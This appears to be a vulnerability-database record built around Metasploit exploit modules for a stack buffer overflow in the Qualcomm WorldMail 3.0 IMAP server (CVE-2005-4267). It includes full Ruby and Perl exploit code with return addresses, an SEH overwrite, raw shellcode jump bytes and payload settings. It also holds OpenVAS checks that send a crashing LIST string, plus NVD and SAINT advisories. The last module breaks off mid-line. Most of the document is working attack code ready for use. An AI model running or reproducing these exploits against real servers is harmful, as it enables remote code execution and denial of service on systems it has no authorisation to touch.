ID EDB-ID:16474 Type exploitdb Reporter metasploit Modified 2010-07-01T00:00:00
Description
Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow. CVE-2005-4267. Remote exploit for windows platform
##
# $Id: eudora_list.rb 9653 2010-07-01 23:33:07Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Imap
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server
version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this
particular vulnerability.
NOTE: The service does NOT restart automatically by default. You may be limited to
only one attempt, so choose wisely!
},
'Author' => [ 'MC', 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9653 $',
'References' =>
[
[ 'CVE', '2005-4267'],
[ 'OSVDB', '22097'],
[ 'BID', '15980'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00\x0a\x0d\x20\x7b",
'StackAdustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
[ 'WorldMail 3 Version 6.1.19.0', { 'Ret' => 0x600b6317 } ], # p/p/r in MLstMgr.dll v6.1.19.0
[ 'WorldMail 3 Version 6.1.20.0', { 'Ret' => 0x10022187 } ], # p/p/r in msremote.dll ?
[ 'WorldMail 3 Version 6.1.22.0', { 'Ret' => 0x10022187 } ], # p/p/r in MsRemote.dll v6.1.22.0
],
'DisclosureDate' => 'Dec 20 2005',
'DefaultTarget' => 0))
end
def check
targ = auto_target
disconnect
return Exploit::CheckCode::Vulnerable if (targ)
return Exploit::CheckCode::Safe
end
def auto_target
connect
if (banner and banner =~ /WorldMail/ and banner =~ /IMAP4 Server (.*) ready/)
version = $1
ver = version.split('.')
if (ver.length == 4)
major = ver[0].to_i
minor = ver[1].to_i
rev = ver[2].to_i
build = ver[3].to_i
if (major == 6 and minor == 1)
return targets[1] if (rev == 19)
return targets[2] if (rev == 20)
return targets[3] if (rev == 22)
end
end
end
# no target found
nil
end
def exploit
if (target_index == 0)
mytarget = auto_target
if mytarget
print_status("Automatically detected \"#{mytarget.name}\" ...")
else
raise RuntimeError, 'Unable to automatically detect a target'
end
else
mytarget = target
connect
end
jmp = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"
sploit = "a001 LIST " + rand_text_alphanumeric(20)
sploit << payload.encoded
sploit << generate_seh_record(mytarget.ret)
sploit << make_nops(8) + jmp + rand_text_alphanumeric(40)
sploit << "}" + "\r\n"
sock.put(sploit)
handler
disconnect
end
end
{"hash": "7acfcc5298bde1a40f8ad2a70d0331c3b9115aa649d9dea5cfa8cb97b589338e", "edition": 1, "lastseen": "2016-02-01T23:57:00", "viewCount": 359, "bulletinFamily": "exploit", "history": [], "id": "EDB-ID:16474", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/16474/", "description": "Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow. CVE-2005-4267. Remote exploit for windows platform", "title": "Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "objectVersion": "1.0", "cvelist": ["CVE-2005-4267"], "sourceData": "##\r\n# $Id: eudora_list.rb 9653 2010-07-01 23:33:07Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Imap\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\r\n\t\t\t\tversion 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\r\n\t\t\t\tparticular vulnerability.\r\n\r\n\t\t\t\tNOTE: The service does NOT restart automatically by default. You may be limited to\r\n\t\t\t\tonly one attempt, so choose wisely!\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC', 'jduck' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9653 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-4267'],\r\n\t\t\t\t\t[ 'OSVDB', '22097'],\r\n\t\t\t\t\t[ 'BID', '15980'],\r\n\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 750,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x7b\",\r\n\t\t\t\t\t'StackAdustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t\t[ 'WorldMail 3 Version 6.1.19.0', { 'Ret' => 0x600b6317 } ], # p/p/r in MLstMgr.dll v6.1.19.0\r\n\t\t\t\t\t[ 'WorldMail 3 Version 6.1.20.0', { 'Ret' => 0x10022187 } ], # p/p/r in msremote.dll ?\r\n\t\t\t\t\t[ 'WorldMail 3 Version 6.1.22.0', { 'Ret' => 0x10022187 } ], # p/p/r in MsRemote.dll v6.1.22.0\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 20 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef check\r\n\t\ttarg = auto_target\r\n\t\tdisconnect\r\n\r\n\t\treturn Exploit::CheckCode::Vulnerable if (targ)\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef auto_target\r\n\t\tconnect\r\n\r\n\t\tif (banner and banner =~ /WorldMail/ and banner =~ /IMAP4 Server (.*) ready/)\r\n\t\t\tversion = $1\r\n\t\t\tver = version.split('.')\r\n\t\t\tif (ver.length == 4)\r\n\t\t\t\tmajor = ver[0].to_i\r\n\t\t\t\tminor = ver[1].to_i\r\n\t\t\t\trev = ver[2].to_i\r\n\t\t\t\tbuild = ver[3].to_i\r\n\t\t\t\tif (major == 6 and minor == 1)\r\n\t\t\t\t\treturn targets[1] if (rev == 19)\r\n\t\t\t\t\treturn targets[2] if (rev == 20)\r\n\t\t\t\t\treturn targets[3] if (rev == 22)\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# no target found\r\n\t\tnil\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tif (target_index == 0)\r\n\t\t\tmytarget = auto_target\r\n\t\t\tif mytarget\r\n\t\t\t\tprint_status(\"Automatically detected \\\"#{mytarget.name}\\\" ...\")\r\n\t\t\telse\r\n\t\t\t\traise RuntimeError, 'Unable to automatically detect a target'\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tmytarget = target\r\n\t\t\tconnect\r\n\t\tend\r\n\r\n\t\tjmp = \"\\x6a\\x05\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x2f\\x77\\x28\"\r\n\t\tjmp << \"\\x4b\\x83\\xeb\\xfc\\xe2\\xf4\\xf6\\x99\\xf1\\x3f\\x0b\\x83\\x71\\xcb\\xee\\x7d\"\r\n\t\tjmp << \"\\xb8\\xb5\\xe2\\x89\\xe5\\xb5\\xe2\\x88\\xc9\\x4b\"\r\n\r\n\t\tsploit = \"a001 LIST \" + rand_text_alphanumeric(20)\r\n\t\tsploit << payload.encoded\r\n\t\tsploit << generate_seh_record(mytarget.ret)\r\n\t\tsploit << make_nops(8) + jmp + rand_text_alphanumeric(40)\r\n\t\tsploit << \"}\" + \"\\r\\n\"\r\n\r\n\t\tsock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "published": "2010-07-01T00:00:00", "href": "https://www.exploit-db.com/exploits/16474/", "osvdbidlist": ["22097"], "references": [], "reporter": "metasploit", "modified": "2010-07-01T00:00:00"}
{"cve": [{"lastseen": "2016-09-03T06:08:46", "references": ["http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359", "http://securityreason.com/securityalert/277", "http://www.vupen.com/english/advisories/2005/3005", "http://www.securityfocus.com/bid/15980", "http://seclists.org/lists/fulldisclosure/2005/Dec/1037.html", "http://securitytracker.com/id?1015391"], "description": "Stack-based buffer overflow in Qualcomm WorldMail 3.0 allows remote attackers to execute arbitrary code via a long IMAP command that ends with a \"}\" character, as demonstrated using long (1) LIST, (2) LSUB, (3) SEARCH TEXT, (4) STATUS INBOX, (5) AUTHENTICATE, (6) FETCH, (7) SELECT, and (8) COPY commands.", "edition": 1, "reporter": "NVD", "published": "2005-12-21T06:03:00", "title": "CVE-2005-4267", "type": "cve", "enchantments": {"score": {"modified": "2016-09-03T06:08:46", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2005-4267"], "scanner": [], "cpe": ["cpe:/a:qualcomm:worldmail:3.0"], "modified": "2011-03-07T00:00:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4267", "id": "CVE-2005-4267", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:46", "references": ["http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359", "http://secunia.com/advisories/17640", "http://securitytracker.com/id/1015391", "http://www.exploit-db.com/exploits/18354"], "pluginID": "802294", "description": "This host is running WorldMail IMAP Server and prone to buffer\noverflow vulnerability.", "edition": 1, "reporter": "Copyright (C) 2012 Greenbone Networks GmbH", "published": "2012-01-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Eudora WorldMail IMAP Server Buffer Overflow Vulnerability", "type": "openvas", "naslFamily": "Buffer overflow", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-4267"], "modified": "2017-04-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802294", "id": "OPENVAS:802294", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_eudora_worldmail_imap_server_bof_vuln.nasl 5888 2017-04-07 09:01:53Z teissa $\n#\n# Eudora WorldMail IMAP Server Buffer Overflow Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation may allow remote attackers to execute\narbitrary code within the context of the application or cause a denial of\nservice condition.\n\nImpact Level: System/Application\";\n\ntag_affected = \"Eudora WorldMail Server 3.0\";\n\ntag_insight = \"The flaw is due to a boundary error when processing user\nsupplied IMAP commands. This can be exploited to cause a stack-based overflow\nvia a long string containing a '}' character.\";\n\ntag_solution = \"Upgrade to Eudora WorldMail Server version 4.0 or later.\nFor updates refer to http://www.eudora.com/worldmail/\";\n\ntag_summary = \"This host is running WorldMail IMAP Server and prone to buffer\noverflow vulnerability.\";\n\nif(description)\n{\n script_id(802294);\n script_version(\"$Revision: 5888 $\");\n script_bugtraq_id(15980);\n script_cve_id(\"CVE-2005-4267\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-07 11:01:53 +0200 (Fri, 07 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-18 14:14:14 +0530 (Wed, 18 Jan 2012)\");\n script_name(\"Eudora WorldMail IMAP Server Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/17640\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id/1015391\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/18354\");\n script_xref(name : \"URL\" , value : \"http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359\");\n\n script_category(ACT_DENIAL);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"find_service.nasl\");\n script_require_ports(\"Services/imap\", 143);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\n## Get IMAP Port\nport = get_kb_item(\"Services/imap\");\nif(!port) {\n port = 143;\n}\n\n## Check Port State\nif(! get_port_state(port)){\n exit(0);\n}\n\n## Open TCP Socket\nif(!soc = open_sock_tcp(port)){\n exit(0);\n}\n\n## Check Banner And Confirm Application\nres = recv(socket:soc, length:512);\nif(\"WorldMail IMAP4 Server\" >!< res)\n{\n close(soc);\n exit(0);\n}\n\n## Build Exploit\nexploit = string(\"LIST \",crap(data:\"}\", length:1000),\"\\r\\n\");\n\n## Send Exploit\nsend = send(socket:soc, data:exploit);\nclose(soc);\n\n## Waiting\nsleep(3);\n\n## Try to Open Socket\nif(!soc1 = open_sock_tcp(port))\n{\n security_message(port);\n exit(0);\n}\n\n## Confirm Server is still alive and responding\nif(! res = recv(socket:soc1, length:512)) {\n security_message(port);\n}\nclose(soc1);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-11T12:43:15", "references": ["http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359", "http://secunia.com/advisories/17640", "http://www.eudora.com/worldmail/", "http://securitytracker.com/id/1015391", "http://www.exploit-db.com/exploits/18354"], "pluginID": "1361412562310802294", "description": "This host is running WorldMail IMAP Server and prone to buffer\n overflow vulnerability.", "edition": 6, "reporter": "Copyright (C) 2012 Greenbone Networks GmbH", "published": "2012-01-18T00:00:00", "title": "Eudora WorldMail IMAP Server Buffer Overflow Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Buffer overflow", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-4267"], "modified": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310802294", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802294", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_eudora_worldmail_imap_server_bof_vuln.nasl 11818 2018-10-10 11:35:42Z asteins $\n#\n# Eudora WorldMail IMAP Server Buffer Overflow Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802294\");\n script_version(\"$Revision: 11818 $\");\n script_bugtraq_id(15980);\n script_cve_id(\"CVE-2005-4267\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-10 13:35:42 +0200 (Wed, 10 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-18 14:14:14 +0530 (Wed, 18 Jan 2012)\");\n script_name(\"Eudora WorldMail IMAP Server Buffer Overflow Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"find_service.nasl\");\n script_require_ports(\"Services/imap\", 143);\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/17640\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id/1015391\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/18354\");\n script_xref(name:\"URL\", value:\"http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation may allow remote attackers to execute\n arbitrary code within the context of the application or cause a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Eudora WorldMail Server 3.0\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a boundary error when processing user\n supplied IMAP commands. This can be exploited to cause a stack-based overflow\n via a long string containing a '}' character.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Eudora WorldMail Server version 4.0 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running WorldMail IMAP Server and prone to buffer\n overflow vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.eudora.com/worldmail/\");\n exit(0);\n}\n\ninclude(\"imap_func.inc\");\n\nport = get_imap_port(default:143);\nbanner = get_imap_banner(port:port);\n\nif(\"WorldMail IMAP4 Server\" >!< banner){\n exit(0);\n}\n\nif(!soc = open_sock_tcp(port)){\n exit(0);\n}\n\nexploit = string(\"LIST \",crap(data:\"}\", length:1000),\"\\r\\n\");\nsend(socket:soc, data:exploit);\nclose(soc);\n\nsleep(3);\n\nif(!soc1 = open_sock_tcp(port)){\n security_message(port:port);\n exit(0);\n}\n\nif(! res = recv(socket:soc1, length:512)){\n security_message(port:port);\n}\n\nclose(soc1);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-12-14T16:58:07", "references": [], "edition": 1, "description": "Added: 12/30/2005 \nCVE: [CVE-2005-4267](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4267>) \nBID: [15980](<http://www.securityfocus.com/bid/15980>) \nOSVDB: [22097](<http://www.osvdb.org/22097>) \n\n\n### Background\n\n[Eudora WorldMail](<http://www.eudora.com/worldmail/>) is an e-mail server for Windows. \n\n### Problem\n\nA long IMAP command ending with a close brace character could result in a buffer overflow, leading to remote command execution. \n\n### Resolution\n\nUpgrade to a version of [Eudora WorldMail](<http://www.eudora.com/worldmail/>) higher than 3.1.22. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2005-12/1014.html> \n\n\n### Platforms\n\nWindows \n \n\n", "reporter": "SAINT Corporation", "published": "2005-12-30T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Eudora WorldMail IMAP LIST command buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4267"], "modified": "2005-12-30T00:00:00", "id": "SAINT:D6EF1C873C300B380058DEF645A0238B", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/worldmail_imap_list_bo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-03T15:01:53", "references": [], "description": "Added: 12/30/2005 \nCVE: [CVE-2005-4267](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4267>) \nBID: [15980](<http://www.securityfocus.com/bid/15980>) \nOSVDB: [22097](<http://www.osvdb.org/22097>) \n\n\n### Background\n\n[Eudora WorldMail](<http://www.eudora.com/worldmail/>) is an e-mail server for Windows. \n\n### Problem\n\nA long IMAP command ending with a close brace character could result in a buffer overflow, leading to remote command execution. \n\n### Resolution\n\nUpgrade to a version of [Eudora WorldMail](<http://www.eudora.com/worldmail/>) higher than 3.1.22. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2005-12/1014.html> \n\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2005-12-30T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "saint", "title": "Eudora WorldMail IMAP LIST command buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4267"], "modified": "2005-12-30T00:00:00", "id": "SAINT:BA9FD8AF36E6EDFB5B24B9CBBC2F9ED6", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/worldmail_imap_list_bo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:16", "references": [], "description": "Added: 12/30/2005 \nCVE: [CVE-2005-4267](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4267>) \nBID: [15980](<http://www.securityfocus.com/bid/15980>) \nOSVDB: [22097](<http://www.osvdb.org/22097>) \n\n\n### Background\n\n[Eudora WorldMail](<http://www.eudora.com/worldmail/>) is an e-mail server for Windows. \n\n### Problem\n\nA long IMAP command ending with a close brace character could result in a buffer overflow, leading to remote command execution. \n\n### Resolution\n\nUpgrade to a version of [Eudora WorldMail](<http://www.eudora.com/worldmail/>) higher than 3.1.22. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2005-12/1014.html> \n\n\n### Platforms\n\nWindows \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2005-12-30T00:00:00", "title": "Eudora WorldMail IMAP LIST command buffer overflow", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4267"], "modified": "2005-12-30T00:00:00", "id": "SAINT:8437D9ACEDAA255328C3DA9041BCAC62", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/worldmail_imap_list_bo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:56", "references": [], "edition": 1, "description": "", "reporter": "MC", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4267"], "modified": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83142/Qualcomm-WorldMail-3.0-IMAPD-LIST-Buffer-Overflow.html", "id": "PACKETSTORM:83142", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Imap \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in the Qualcomm WorldMail IMAP Server \nversion 3.0 (build version 6.1.22.0). Using the PAYLOAD of windows/shell_bind_tcp \nallows or the most reliable results. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-4267'], \n[ 'OSVDB', '22097'], \n[ 'BID', '15980'], \n \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 750, \n'BadChars' => \"\\x00\\x0a\\x20\\x0d\\x7b\", \n'StackAdustment' => -3500, \n'EncoderType' => Msf::Encoder::Type::AlphanumUpper, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'WorldMail 3 Version 6.1.20', { 'Ret' => 0x10022187 } ], # msremote.dll \n], \n'DisclosureDate' => 'Dec 20 2005', \n'DefaultTarget' => 0)) \nend \n \ndef check \nconnect \ndisconnect \n \nif (banner and banner =~ /WorldMail 3 IMAP4 Server 6.1.22.0 ready/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \njmp = \"\\x6a\\x05\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x2f\\x77\\x28\" \njmp << \"\\x4b\\x83\\xeb\\xfc\\xe2\\xf4\\xf6\\x99\\xf1\\x3f\\x0b\\x83\\x71\\xcb\\xee\\x7d\" \njmp << \"\\xb8\\xb5\\xe2\\x89\\xe5\\xb5\\xe2\\x88\\xc9\\x4b\" \n \nsploit = \"a001 LIST \" + rand_text_alpha_upper(20, payload_badchars) \nsploit << payload.encoded + \"\\xeb\\x06\" + make_nops(2) + [target.ret].pack('V') \nsploit << make_nops(8) + jmp + rand_text_alpha_upper(40, payload_badchars) \nsploit << \"}\" + \"\\r\\n\" \n \nsock.put(sploit) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83142/eudora_list.rb.txt"}, {"lastseen": "2016-12-05T22:18:26", "references": [], "edition": 1, "description": "", "reporter": "y0", "published": "2006-02-14T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "packetstorm", "title": "eudora_imap.pm.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4267"], "modified": "2006-02-14T00:00:00", "href": "https://packetstormsecurity.com/files/43817/eudora_imap.pm.txt.html", "id": "PACKETSTORM:43817", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be redistributed \n# according to the licenses defined in the Authors field below. In the \n# case of an unknown or missing license, this file defaults to the same \n# license as the core Framework (dual GPLv2 and Artistic). The latest \n# version of the Framework can always be obtained from metasploit.com. \n## \n \npackage Msf::Exploit::eudora_imap; \nuse strict; \nuse base 'Msf::Exploit'; \nuse Msf::Socket::Tcp; \nuse Pex::Text; \n \nmy $advanced = { \n}; \n \nmy $info = { \n'Name' => 'Qualcomm WorldMail IMAPD Server Buffer Overflow', \n'Version' => '$Revision: 1.1 $', \n'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ], \n'Arch' => [ 'x86' ], \n'OS' => [ 'win32', 'win2000'], \n'Priv' => 1, \n \n'UserOpts' => \n{ \n'RHOST' => [1, 'ADDR', 'The target address'], \n'RPORT' => [1, 'PORT', 'The target port', 143], \n}, \n \n'AutoOpts' => { 'EXITFUNC' => 'process' }, \n'Payload' => \n{ \n'Space' => 750, \n'BadChars' => \"\\x00\", \n'Prepend' => \"\\x81\\xec\\x96\\x40\\x00\\x00\\x66\\x81\\xe4\\xf0\\xff\", \n}, \n \n'Encoder' => \n{ \n'Keys' => ['+alphanum'], \n}, \n \n'Description' => Pex::Text::Freeform(qq{ \nThis module exploits a stack overflow in the Qualcomm WorldMail IMAP Server \nversion 3.0 (build version 6.1.22.0). \n}), \n \n'Refs' => \n[ \n['CVE', '2005-4267'], \n['BID', '15980'], \n], \n \n'Targets' => \n[ \n['Windows 2000 Pro English ALL', 0x75022ac4], \n], \n \n'DefaultTarget' => 0, \n \n'Keys' => ['imap'], \n \n'DisclosureDate' => 'Dec 20 2005', \n}; \n \nsub new { \nmy $class = shift; \nmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); \n \nreturn($self); \n} \n \nsub Check { \nmy ($self) = @_; \nmy $target_host 